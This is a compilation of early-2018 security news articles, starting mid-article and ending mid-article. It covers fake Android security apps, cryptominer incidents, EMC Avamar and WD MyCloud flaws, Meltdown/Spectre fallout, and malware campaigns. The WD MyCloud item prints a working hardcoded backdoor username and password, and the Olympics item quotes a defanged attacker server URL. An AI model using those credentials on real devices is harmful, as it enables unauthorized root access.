“These apps posed as useful security tools under the names Security Defender, Security Keeper, Smart Security, Advanced Boost, and more. They also advertised a variety of capabilities: scanning, cleaning junk, saving battery, cooling the CPU, locking apps, as well as message security, WiFi security, and so on.” reads the blog post published Trend Micro.

“The apps were actually able to perform these simple tasks, but they also secretly harvested user data, tracked user location, and aggressively pushed advertisements.”

The apps collect information such as the user’s Android ID, Mac address, IMSI, OS data, brand and model of the device, device specifics, language, location information, and data on installed apps like Google Play and Facebook to sends to a remote server.

The malicious apps are also capable of uploading installed app information, attachments, user operational information, and data on activated events as well.

When the apps are launched for the first time, they will not appear on the device launcher’s list of applications, the shortcuts will also not appear on the device screen in this way victims will only be able to see notifications sent by the apps. The malicious apps typically push alarmist security warnings and pop-up windows to the victims.

Experts noticed that the apps implement a specific function called “hide” that will not allow the applications to run on specified devices including the Google Nexus 6P, Xiaomi MI 4LTE, ZTE N958St and LGE LG-H525n. Experts believe that the “hide” function was developed to avoid security checks implemented by Google Play.

The apps bombard the users with false security notifications and other messages like advertisements, examples of notifications are “10.0 GB files are being wasted” or “Fraud SMS Broadcast Vulnerability.”

security%20tools%20malicious%20apps

If a user clicks the displayed button on the prompt, the fake security tools will show a simple animation notifying the resolution of the problem.

“The user is bombarded with ads with almost every action. It is clear that one of the main focuses of the app is ad display and click fraud.” continues the analysis.

“Users are actually asked to sign and agree to a EULA (end-user license agreement) which describes the information that will be gathered and used by the app,” researchers said in the report. “But we can still say that the app abuses privacy because the collection and transmission of personal data is unrelated to the functionality of the app.”

The game security tools were spotted in December 2017 and promptly removed.


BlackBerry Mobile Website hacked, crooks installed a Coinhive’s code to mine Monero
8.1.2018 securityaffairs Hacking

According to Coinhive, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento e-commerce software.
The spike in the value of some cryptocurrencies like Bitcoin is attracting the interest of cyber criminals. The numbers of incidents and cyber attacks involving miners and mining scripts continue to increase and the last in order of time seems to be the BlackBerry Mobile Site.

On January 6, a Reddit user that handle the moniker “Rundvleeskroket” claims that the official website of BlackBerry Mobile was caught using Coinhive’s cryprocurrency code to mine Monero. Rundvleeskroket wrote that his friend pointed out that Blackberry Mobile domain (blackberrymobile.com) was using the Coinhive code,

“A friend of mine just pointed this out to me.
Have a look at the source code on their pages. This is an official site where BB links to themselves from their product pages at blackberry.com.

Image.” he wrote.

Originally pointed out by /u/cryptocripples on /r/security

Update: it seems like only their global site is affected. So anyone getting redirected to CA, EU, US, etc won’t have the coinhive miner running while the site is open.”

The Reddit user also shared the following screenshot:

coinhive%20script%20blackberry%20mobile

The Coinhive code was removed from the BlackBerry mobile site, unfortunately, such kind of incidents is becoming frequent. In many cases, website owners are using the CoinHive code to generate Monero exploiting computational resources of unaware visitors.

In December experts from Sucuri discovered that nearly 5,500 WordPress websites were infected with a malicious script that logs keystrokes and in loads a cryptocurrency miner in the visitors’ browsers.

In November, experts reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

According to a Coinhive’s comment on the Reddit post, the BlackBerry Mobile website was hacked by exploiting a critical security vulnerability in the Magento ecommerce software.

According to Coinhive, the same Coinhive’s account was used in the hack of many other websites, for this reason, it was suspended.

“Coinhive here. We’re sorry to hear that our service has been misused. This specific user seems to have exploited a security issue in the Magento web shop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.” commented Coinhive.


Monero Miner Sends Cryptocurrency to North Korean University
8.1.2018 securityweek Hacking
An application compiled just weeks ago was found to be an installer for a Monero miner designed to send the mined currency to a North Korean university, AlienVault reports.

The application’s developers, however, might not be of North Korean origins themselves, the security researchers say. They also suggest that the tool could either be only an experimental application or could attempt to trick researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu.kp server. The use of this domain reveals that the server is located at Kim Il Sung University, AlienVault says.

AlienVault's security researchers also discovered that the specified address doesn’t resolve, either because the app was designed to run on the university’s network, because the address used to resolve in the past, or because it is only meant to trick security researchers.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining,” AlienVault says.

The sample was also found to contain obvious messages printed for debugging as well as fake filenames meant to avoid detection. According to the researchers, if the software author is at the Kim Il Sung University, they might not be North Korean.

“KSU is an unusually open University, and has a number of foreign students and lecturers,” the researchers explain.

North Korean attacks focused on Monero mining have been spotted before, such as those associated with Bluenorroff and Andariel hackers, who are generally considered as being part of the Lazarus group. However, AlienVault hasn’t discovered evidence to link the newly found installer to the previous attacks.

“The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code. Given the amateur usage of Visual Basic programming in the Installer we analyzed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project,” the researchers note.

On the other hand, with the country hit hard by sanctions, crypto-currencies could easily prove highly valuable resources, and a North Korean university’s interest in the area wouldn’t be surprising.

In fact, the Pyongyang University of Science and Technology recently invited foreign experts to lecture on crypto-currencies, and the recently discovered installer might be a product of their endeavors, AlienVault suggests.


Serious Flaws Affect Dell EMC, VMware Data Protection Products
8.1.2018 securityweek
Vulnerebility
Data protection products from both Dell EMC and VMware are impacted by three potentially serious vulnerabilities discovered by researchers at Digital Defense.

EMC told customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products have a common component, the Avamar Installation Manager (AVI). This component is affected by vulnerabilities that can be combined to take complete control of a system.

The most serious of the flaws, CVE-2017-15548, allows a remote attacker to bypass authentication and gain root access to the system. The vulnerability is related to the fact that authentication is performed via a POST request that includes the username, password and a parameter named wsUrl.

“The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” Digital Defense explained. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn't require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second vulnerability, CVE-2017-15549, allows an authenticated attacker with low privileges to upload malicious files to the server.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character,” researchers said. “The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third security hole, CVE-2017-15550, has been described as a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“The getFileContents method of the UserInputService class doesn't perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability,” researchers said.

Combining the flaws allows a remote attacker to take complete control of a vulnerable system.

EMC Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4.x and 7.5.0, EMC NetWorker Virtual Edition (NVE) 9.0.x, 9.1.x and 9.2.x, and EMC Integrated Data Protection Appliance 2.0 are impacted. EMC has released patches for each of the affected products.

Digital Defense told SecurityWeek that there are more than 100 Avamar server instances accessible from the Internet – according to the Shodan search engine – which experts say is unexpected considering that the affected products are backup and deduplication appliances.

While a blog post from Digital Defense and some media reports describe the flaws as “zero-days,” the vendor has released patches prior to disclosure and there is no evidence of exploitation in the wild.

The vulnerabilities also affect VMware’s vSphere Data Protection (VDP) product. VMware informed customers of the issues on January 2, but it did not reference Digital Defense or EMC. Digital Defense told SecurityWeek that VMware’s VDP is a derivative of the EMC product and EMC informed VMware of the security bugs.


Lawsuits Filed Against Intel Over CPU Vulnerabilities
8.1.2018 securityweek
Vulnerebility
At least three class action lawsuits have been filed against Intel in the past days over the recently disclosed vulnerabilities that could allow malicious hackers to obtain potentially sensitive information from computers.

The Meltdown and Spectre attack methods uncovered by several independent research teams work not only against Intel processors, but also against CPUs from AMD and ARM. Intel has been hit the hardest – even its stock went down after initial reports claimed only Intel processors were affected – but the company says media reports describing the design flaws are overblown.

The lawsuits, all seeking class action status, have been filed in the Northern District of California, the Southern District of Indiana, and the District of Oregon, and they accuse Intel of violating state consumer protection laws. All complaints demand a jury trial.

In California, Branstetter, Stranch & Jennings of Nashville and Doyle APC of San Diego filed a consumer fraud case, accusing Intel of misleading consumers about the performance and reliability of its processors by selling a product with “fatal” security flaws.

The complaint filed in Indiana alleges that “Intel committed unfair and deceptive acts by representing that the Intel CPUs had performance, characteristics, or benefits which Intel knew or should reasonably have known they did not have.”

The chip giant has also been accused of breaching warranties by selling defective CPUs that it’s not willing to repair or replace free of charge. The Indiana lawsuit also claims the company was negligent in the manufacture and design of its processors.

In Oregon, plaintiffs say they are entitled to restitution based on Intel’s “intentional and knowing failures to disclose material defects.” The complaint claims plaintiffs would have acquired a CPU from an Intel competitor had they known about the flaws and the fact that they will end up with a slower product.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps. The bugs that make these attacks possible are said to date back 20 years.

Intel and other major tech companies have started releasing patches and workarounds for the vulnerabilities, and many believe it’s enough for the time being. Some have suggested that Intel may need to recall impacted CPUs, but the vendor says that will not happen considering that the issue can be mitigated at software level.

Significant performance penalties have been observed in some cases, but Intel says most consumers will not experience any problems, and it’s confident that any penalties will be mitigated over time.

AMD has confirmed that some of the flaws also affect its own processors, but claims the risk of attacks is “near zero.” ARM, whose technology is used by Apple and Qualcomm, also confirmed that nearly a dozen of its Cortex CPUs are impacted.


Hardcoded Backdoor Found on Western Digital Storage Devices
8.1.2018 securityweek
Vulnerebility
Firmware updates released by Western Digital for its MyCloud family of devices address a series of security issues, including a hardcoded backdoor admin account.

The vulnerabilities were found in WDMyCloud firmware prior to version 2.30.165 and are said to affect devices such as MyCloud, MyCloudMirror, My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100, and My Cloud DL4100.

Discovered by GulfTech security researcher James Bercegay, the security flaws could be exploited to achieve remote root code execution on the affected WD My Cloud personal cloud storage units (the device is currently the best-selling NAS (network attached storage) device on Amazon).

One of the most important security issues the researcher found was an unrestricted file upload vulnerability created by the “misuse and misunderstanding of the PHP gethostbyaddr() function,” the researcher says.

The vulnerable code in said file allows an attacker to define a remote auth server, which could be an attacker-controlled server. The result should fail if an invalid host is defined, but a series of bugs result in checks being skipped, eventually allowing an attacker to abuse the issue “to upload any file to the server that they want.”

While analyzing CGI binaries on the webserver, the security researcher discovered code where login functionality would specifically look for an admin user named “mydlinkBRionyg” and would accept the password “abc12345cba”.

The researcher then discovered that the backdoor could be turned into a root shell that would allow an attacker to execute any commands as root and gain control of the affected device. Damaging a vulnerable device would be extremely easy and would not require authentication.

“The triviality of exploiting this issues makes it very dangerous, and even wormable. Not only that, but users locked to a LAN are not safe either. An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.,” Bercegay explains.

In addition to the two critical vulnerabilities, the security researcher discovered a series of other dangerous issues as well in the WDMyCloud firmware. These bugs, however, are not deemed Critical, especially since some of them require authentication to be exploited.

The WDMyCloud web interface was found to lack an effective Cross site request forgery protection and exploitation of the issue is trivial, the researcher says. WDMyCloud is also plagued with a series of command injection issues. An attacker can abuse the language preferences functionality to cause denial of service to the web interface and can dump a list of all users, including detailed user information.

The researcher also discovered that the exact same mydlinkBRionyg backdoor account was found in the D-Link DNS-320L ShareCenter NAS device a while back, supposedly because both devices shared common firmware code. However, the issue was addressed in D-Link DNS-320L with firmware version 1.0.6, released in July 2014.

“It is interesting to think about how before D-Link updated their software two of the most popular NAS device families in the world, sold by two of the most popular tech companies in the world were both vulnerable at the same time, to the same backdoor for a while. The time frame in which both devices were vulnerable at the same time in the wild was roughly from early 2014 to later in 2014 based on comparing firmware release note dates,” Bercegay notes.

The researcher reported all these vulnerabilities to the vendor in June 2017. Firmware release 2.30.174 should address all of these issues.


Microsoft Patches for CPU Flaws Break Windows, Apps
8.1.2018 securityweek
Vulnerebility
Users have complained that the updates released by Microsoft last week for the Spectre and Meltdown vulnerabilities cause Windows to break down on some computers with AMD processors.

Several individuals whose computers rely on AMD processors, particularly older Athlon models, say they are unable to start Windows 10 after installing KB4056892, an update released by Microsoft in response to the disclosure of serious flaws affecting Intel, AMD and ARM processors.

The security holes have been dubbed Spectre and Meltdown and they allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Both local and remote exploitation are possible.

Users have reported that after installing Microsoft’s update the operating system freezes during boot when the Windows logo is displayed. Some users claimed to have had problems reverting to a previous state, and those who did manage to do it warned that the automatic update feature needs to quickly be disabled to prevent the update from being reinstalled.

While a majority of the affected users appear to have older AMD Athlon processors, some devices with AMD Turion CPUs also appear to have been hit.

Microsoft has not shared any information regarding this issue. A Microsoft spokesperson told SecurityWeek that the company is aware of the reports and is investigating.

Users have reported other problems as well after installing KB4056892. Owners of Asus devices say they receive an error message related to an Asus utility after updating.

The Spectre/Meltdown updates appear to break the PulseSecure VPN on both Windows 10 and Windows 8.1 – the patch for Windows 8.1 is included in KB4056898. The VPN vendor has released patches to address the issue.

Some Windows users report that they simply cannot install the patches for the CPU vulnerabilities, and some say their web browsers have started crashing after applying the update.

Shortly after releasing the Meltdown/Spectre updates, Microsoft warned that it had identified some compatibility issues with some antivirus products. The company informed users that if they had not been offered the security updates, they may be running an incompatible antivirus application.


Cybersecurity's Venture Capital and Private Equity Money-go-Round
8.1.2018 securityweek Cyber
Access to Money at the Right Time is Essential for Cybersecurity Firms Given the Volatility of the Market

Security firms bought by and consumed within larger firms can easily lose their way. It happened with McAfee, bought by Intel in 2010 for $7.68 billion, and extracted with a 51% purchase by private equity (PE) firm TPG in April 2017. The extraction valued McAfee at only $4.2 billion.

McAfee will be hoping that it can emulate SonicWall -- which also lost its way after being bought by Dell (from Thoma Bravo) in 2012. In the summer of 2016, Francisco Partners and Elliott Management extracted SonicWall (along with Quest Software) for a price reported by Reuters to around $2 billion. Thoma Bravo did not disclose the price Dell paid for SonicWall, but the Wall Street Journal suggested it was $1.2 billion.

Dell acquired Quest Software for $2.4 billion in 2012 -- making the combined cost of the two firms somewhere in the region of $3.6 billion. In short, the two firms together fell in value from $3.6 billion to just $2 billion in the five years they spent as part of Dell.

Since then, SonicWall has been turned around under PE guidance and the stewardship of CEO Bill Connor. A little over a year after purchasing the two firms, Francisco Partners announced that it had completed a $2 billion debt refinancing, due to the strong operating performance of the firms. The refinancing was significantly oversubscribed, it reduces the operating overheads of the firms, and positions them nicely for further growth.

Private Equity in Cybersecurity

Access to money at the right time (and a few other things like the right management team) is essential for cybersecurity firms given the volatility of the market in both emerging start-ups and changing technology. This means that finding the right backers and understanding the investment market could be fundamental to the prospects of almost any cybersecurity firm. Excluding the unknown potential of the new small-scale crowdfunding options, there are three primary sources of serious money: angel investment, venture capital (VC) and private equity (PE).

'Angels' tend to be individuals -- or possibly collections of individuals -- who invest their own money in promising ideas. They are often important in getting a new company started; but do not normally have sufficient funds to take a growing company to the next level.

That next level of funding generally comes from venture capital (VC). VC funds "like Paladin, Amadeus and others step in to provide capital to entrepreneurs just after their angel or ‘proof of concept' phase of funding," explains Nazo Moosa. Moosa this year formed a new European VC firm called VT Partners, with the express purpose of injecting U.S.-style funding and growth into the under-performing European cybersecurity company market.

The key point for VC is that it funds new companies with new ideas. At this stage they are promising rather than proven; some will succeed, many will fail. Because of the additional risk to the investors, VC money is invested at high interest rates. This is the biggest problem area for the cybersecurity industry -- because of the high interest rates, returns need to be made relatively fast, and/or additional investment found. A company's value is often based on the number of its users, so sales can in many cases be more important than further product development.

Of course, not all VC firms are there just for a quick return. Dan Schiappa, Sophos SVP and GM, explains, "The top echelon investors are not in it for the quick turnaround, but instead they are long-term investors that will add value to a management team and towards building a long term viable company." But he adds, "VCs who look to build a company for acquisition from the get-go are the ones to avoid, as they may drive behaviors that are not beneficial to customers or product quality."

The problem is that cybersecurity attracts both types of VC money, simply because it is hot. "Everybody is under attack all of the time," comments Connor "from other countries, cybercriminals, and hacktivists. So it's a hot area and hot areas tend to attract a lot of opportunity and a lot of money. From that there are a lot of start-ups with new 'silver bullets' that attract VC."

Schiappa believes there is a common cycle for new security companies. Initial idea and development is followed by VC investment. The money enables strong marketing, which effectively makes or breaks the business depending on the inherent strength of the initial product.

"At the end of the day," Schiappa explains, "much of the problem is that tech entrepreneurs follow the logic of getting product out as quickly as possible and gaining feedback. While in some circumstances that is a good and viable strategy, in others, it produces low quality products, that may be innovative, but are not suitable to build a scalable business. Startups get hyped, their innovation gets adopted; but then -- when they hit a scale that goes beyond the business or the product -- they enter the trough of sorrow, where investment is needed to build the product properly. During this period of time, you usually see a pickup in marketing in order to keep the momentum going. It can takes years for a company to exit the trough with the quality product and business operations to scale to a legitimate business."

The problem for the cybersecurity industry is that new ideas do not often have 'years' to spare; they are constantly being supplanted by new and different ideas and technology.

"The hype cycle is where a startup can make it or break it," he continues. "If they are building quality products during the hype cycle, they will withstand the scale and not enter the trough, or enter it very briefly. Those who ship a product that is barely more than a prototype are destined for disaster."

Some VC investors collude in this cycle by insufficiently understanding cybersecurity. "There is a lot of money at play in the security space," warns Connor, "because it's such an interesting area, and an area that's not going to go away -- and there's also a lot of money that doesn't really understand security. It's not necessarily dumb money, but it's at risk in this space."

A good VC is not just a money lender -- it's a mentor who, adds Schiappa, "will guide the company properly and even provide technical advisers who can ensure that the product is built with production quality."

Company founders and private investors usually have one common long-term aim -- to maximize a return on their time and capital. There are three primary routes: sale to a larger company; going public and raising money on a stock exchange; and attracting the next level of private investment. The next level is 'private equity'. It is 'big money' that generally becomes available to companies that have been through the early growth phases of venture capital and have demonstrated the potential for future growth.

PE differs from VC in two primary ways: firstly there is generally more money available than there is in VC; and secondly, PE usually seeks to take a greater stake in the company -- if not actual ownership -- rather than simply investing in it. "PE firms tend to take on more ownership and liability of a company," comments Nathan Wenzler, "and so, they tend to have a stronger motivation to invest in the long term viability of it."

In this way, private equity firms play a different role in the evolution of a company. A PE firm looks for demonstrable potential. It is not interested in firms that have maxed their potential, but in firms that are perhaps slightly under-performing.

"They tend," explains Schiappa, "to acquire a company that has been an established vendor, has meaningful billings and revenues, but might not be operating at its full potential." SonicWall and McAfee both fit this bill. By improving performance, the PE firm will be able to gain its own return through one of two exit strategies: sale to a big security firm (or a larger PE firm); or going public. Unlike the majority of VC firms, PE tends to take a longer term view of the growth of its investment.

One method of improving performance -- beyond simply injecting capital -- is to strengthen the management team. A PE firm, says Schiappa, will "typically bring in professional leaders to guide the company to the public markets or to a larger exit. The PE firm is definitely investing with an exit in mind and their goal is to build value in the asset towards meeting that need. In most cases it is always beneficial to the company and their strategy and operations."

When Francisco Partners acquired SonicWall from Dell, it was because SonicWall was losing its way despite having proven product, and therefor potential. "What Francisco Partners saw," explains Connor, "was a multiple $100m dollar company where the revenue was going down. It was losing money, but some of us -- and that included myself -- knew that the company had been growing before and made money before; both when it was private and public. So we knew it just needed to get restructured, or rebuilt and refocused -- which is what I've done over the last years."

The first thing the PE company did was to bring in Bill Connor as the new CEO. Connor already had successful experience in working with a PE firm, having taken Entrust through its four-year period with Thoma Bravo to its sale to the Datacard Group in 2013; for what he says was six and a half times the PE firm's original investment.

This is the cybersecurity money-go-round. VC firms look for the next silver bullet that could give the investors a high return over a short period. It tends to be new technology or an innovative idea; but there is no company track record. The risks are higher, so the cost of the money is more expensive. This can lead to increased pressure on the company to grow as fast as possible. If that growth can be sustained, the company will succeed; if it cannot, it will fail.

If the company succeeds, it can then become a target for private equity investment. That company now has a track record, but PE is looking for the potential for even greater growth through a combination of additional funds and perhaps improved leadership. There are, and there always will be, casualties -- both in silver bullet companies that prove to lack luster, and buyers of those products. During the hype phase of VC, users can be persuaded to buy a product that under-performs and ultimately fails -- and that could prove costly to the user beyond the price of the product. The PE phase is more stable. PE firms are confident that the product is good and the market is strong.

Overall, the system works. By far the majority of big cybersecurity firms are U.S.-based, with only a handful of European firms reaching a similar scale. It is no coincidence that the U.S. has five times the venture funding as that of Europe. But to use the system profitably, new companies need to choose the right VC investment in their early years. Cybersecurity firms should examine the track record of VC firms just as closely as PE firms examine the track record of the cybersecurity firms.

Incidentally, Dell, which first bought SonicWall and then sold it to PE firms Francisco Partners and Elliott Management, has its own investments history. It started in 1984 with Michael Dell building and selling personal computers while he was a student at the University of Texas at Austin, using $1,000 capital provided by his family. As he proved his worth, his family increased their 'investment' to a loan of $500,000, similar to early stage 'angel' investments.

As his firm grew, Dell did not proceed to the venture capital stage. Instead, he hired a retired merchant banker and venture capitalist, Lee Walker, as president and CEO. Walker helped secure the firm's first serious credit -- a bank's line of credit for $10 million. Dell also skipped the private equity stage, and raised capital in a private placement in 1987 and went public via an initial public offering in 1988. Michel Dell retained a significant position in the company, but no longer had personal control.

During the 1990s, the company continued to prosper, but started to suffer from the increasing commoditization of personal computers after 2000, and the later effect of mobile devices on the PC market. Dell's market dominance declined -- but in 2013 Dell announced that Michael Dell and Silver Lake Partners, together with a $2 billion loan from Microsoft, would take the company private in a $24.4 billion leveraged buyout deal. In essence, Michael Dell used private equity to escape from public ownership rather than the more usual route of using it to prepare for public ownership.

It was the PE-backed Dell that announced the purchase of EMC for $67 billion in October 2015, completing the deal in September 2016. The combined companies became Dell Technologies, the world's largest privately controlled integrated technology company, which also includes security industry pioneeer RSA.


Microsoft KB4056892 Meltdown/Spectre patch bricks AMD Athlon-powered machines
8.1.2017 securityaffairs
Vulnerebility

Many users claim the Security Update for Windows KB4056892, the Microsoft Meltdown/Spectre patch, bricks AMD Athlon-powered machines.
Meltdown and Spectre vulnerabilities will continue to create a lot of problems to users and chip vendors.

As you know, tech giants like Apple, Cisco and Microsoft admitted the problem for their products and started rolling out security patched.

While many experts argued that the fixes will have a significant impact on the performance of any devices, Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Unfortunately, the problems seem not ended, the fix released by Microsoft for the Meltdown and Spectre attacks (Security Update for Windows KB4056892) is bricking some AMD PCs, in particular, Athlon-powered machines.

Let’s remind that AMD CPUs are not susceptible to the Meltdown attack, but are vulnerable only to Spectre attacks.

amd

In this thread on answers.microsoft.com, many users claim that the Security Update for Windows KB4056892 bricks some AMD-powered PCs and leaves them displaying with the Windows startup logo.

“I have older AMD Athlon 64 X2 6000+, Asus MB, after installation of KB4056892 the system doesn’t boot, it only shows the Windows logo without animation and nothing more. After several failed boots it do roll-back then it shows error 0x800f0845. Unfortunately, it seems it’s not easy to disable the automatic updates without gpedit tweaks, so it tries installing and rolling-back the update over and over. ” reported an angry user.

Athlon-powered systems just after the installation of the patch stopped working, and the worst news is that the fix doesn’t create a recovery point, and rollback is some cases not accessible.

Some users reported that even re-installing Windows 10 doesn’t solve the problem.

Affected users will need to disable Windows Update, but only Microsoft can solve the embarrassing situation for its AMD users.

At the time, the thread did not include any response from Microsoft.


Following recent mass demonstration, Iran Infy group may attempt to target protesters and their foreign contacts
8.1.2017 securityaffairs BigBrothers

Following the recent mass demonstration, the Iran-linked Infy group may attempt to target protesters and their contacts abroad.
The crackdown of Iranian authorities on protesters and dissident could have a wide range and involve anyone in contact with them.

According to cybersecurity firms and researchers, a nation-state actor called Infy is intensifying its attacks against anyone is in contact with protesters.

The state-sponsored hackers target victims with spear-phishing messages that are constantly refined and improved.

According to the experts Palo Alto Networks, the Infy group is active at least since 2007, its malware was involved in attacks in the country and abroad.

The name Infy malware is based on a string used by the VXers in filenames and command and control (C&C) folder names and strings.

Infy%20group

The Infy malware was first submitted to VirusTotal on August 2007, meanwhile, the C&C domain used by the oldest sample spotted by the experts has been associated with a malicious campaign dated back December 2004.

The malware evolved over the years, the authors improved it by implementing new features such as support for the Microsoft Edge web browser that was introduced in the version 30.

Unlike other Iranian nation-state actors who target foreign organizations, the Infy group appears focused on opponents and dissidents.

Researchers Colin Anderson and Claudio Guarnieri, authors of the research titled “Iran and the Soft War for Internet Dominance,” confirmed that the Infy attackers were responsible for a large number of attempted malware attacks against Iranian civil society since late 2014.

In response to the recent mass demonstrations, the Iran Government also tried to isolate the protests by blocking internet on mobile networks, the authorities blocked Instagram and messaging services like Telegram.

Security experts believe that protesters will be targeted by the Infy actor, its malware will be used against anyone has any kind of relationship with them.


Spear phishing attacks already targeting Pyeongchang Olympic Games
8.1.2017 securityaffairs
Phishing

Hackers are already targeting the Pyeongchang Olympic Games with spear phishing attacks aimed at stealing sensitive or financial information.
Security researchers from McAfee reported hackers are already targeting Pyeongchang Olympic Games, many organizations associated with the event had received spear phishing messages.

Most of the targeted organizations is involved with the Olympics either in providing infrastructure or in a supporting role.

“Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).” reported McAfee.

“The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role.”

Pyeongchang%20Olympic%20Games

The campaigns have begun on December 22, attackers used spoofed messages that pretend to come from South Korea’s National Counter-Terrorism Center.

The hackers spoofed the message to appear to be from info@nctc.go.kr, which is the National Counter-Terrorism Center (NCTC) in South Korea, the analysis revealed the email was sent from an address in Singapore and referred alleged antiterror drills in the region in preparation for the Olympic Games.

Attackers attempt to trick victims into opening a document in Korean titled “Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics.”

Initially, the malware was embedded into the malicious document as a hypertext application (HTA) file, then threat actors started hiding the malicious code in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. Researchers also noted that attackers wrote a custom PowerShell code to decode the hidden image and launch the malware.

“When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php” continues the analysis.

“Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware.”

The experts expect more hacking campaigns targeting entities involved in sporting events like Pyeongchang Olympic Games.

“With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes,” the McAfee report concluded.

“In similar past cases, the victims were targeted for their passwords and financial information.”


US National Security Agency Director Admiral Mike Rogers to Retire
8.1.2017 securityaffairs BigBrothers

After a four-year term, the National Security Agency Director Admiral Mike Rogers plans to retire, he sent a letter to its staff on Friday informing them that he would depart next spring.
After a four-year term, the National Security Agency chief Admiral Mike Rogers plans to retire within months.

The Admiral Mike Rogers was chosen by President Barack Obama in 2014 when he replaced Gen. Keith Alexander. He was nominated for his significant experience in the cybersecurity field, he was involved in cyber defense and offense policy issues as head of the Fleet Cyber Command.

Admiral%20Mike%20Rogers

The news was confirmed by US intelligence sources, the Admiral Mike Rogers who also led the US Cyber Command sent a letter to its staff on Friday informing them that he would depart next spring.

The Rogers’s successor will be nominated by President Donald Trump this month.

Rogers is in opposition to Trump, The Observer reported recently that he has admitted in a private town-hall-style meeting of NSA staffing that Donald Trump did, in fact, collude with the Russians.

Rogers along with other US security chiefs presented a report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election.

Unfortunately, during his management of the management the agency faced the clamorous and disconcerting leak of its exploits and hacking tools from its arsenal.


Experts found a strain of the Zeus banking Trojan spread through a legitimate developer’s website
8.1.2017 securityaffairs
Virus

Malware researchers at Talos group have discovered a strain of Zeus banking Trojan that abuses the legitimate website of the Ukraine-based accounting software developer Crystal Finance Millennium (CFM).
The experts discovered that the version of the ZeuS banking Trojan used in this attack is the 2.0.8.9 that was leaked in 2011.

The attack occurred in August 2017, during the time frame associated with the observance of the Independence Day holiday in Ukraine, but researchers from Talos disclosed details of the attack online now.

Experts found many similarities with the attack vector used in the NotPetya case, hackers. While in the NotPetya attack hackers compromised the supply chain of the software fir M.E.Doc to distribute the malware, in the case of the Zeus banking Trojan threat actors relied on accounting software maker CFM’s website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

Researchers from Talos were able to register and sinkhole one of the Command and Control (C2) domains used by the attackers, in this way they were able to gather information about the number and the nature of the infected systems.

Attackers used spam emails with a ZIP archive containing a JavaScript file, which was used a downloader. The researchers discovered that one of the domains used to host the malware payload was associated with CFM’s website, attackers used it also to distribute PSCrypt ransomware.

The analysis of the infection process revealed that once executed the malware would first perform a long list of anti-VM checks to determine whether it runs in a virtualized environment. If not, the malicious code achieves persistence by creating a registry entry to ensure execution at system startup.

Then the malware attempts to connect to several C&C servers and experts from Talos discovered that one of them was not registered at the time of the analysis … a gift for the researchers that used it to sinkhole the botnet.

Most of the infected systems were located in Ukraine, followed by the United States.

“Interestingly, most of the systems which beaconed to our sinkhole server were located in Ukraine with United States being the second most affected region. A graph showing the ISPs that were most heavily affected is below:”

Zeus%20Banking%20Trojan%20attacks

“As can be seen in the graph above, PJSC Ukrtelecom was by far the most heavily affected. This ISP is the company governed by the Ministry of Transportation and Communications in Ukraine. In total, our sinkhole logged 11,925,626 beacons from 3,165 unique IP address” states the analysis from Talos.

According to Talos hackers are refining their attack techniques and are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers.


Qualcomm Working on Mitigations for Spectre, Meltdown
8.1.2018 securityweek
Vulnerebility
Qualcomm has confirmed that some of its products are affected by the recently disclosed Spectre and Meltdown vulnerabilities, but the company says mitigations are being deployed.

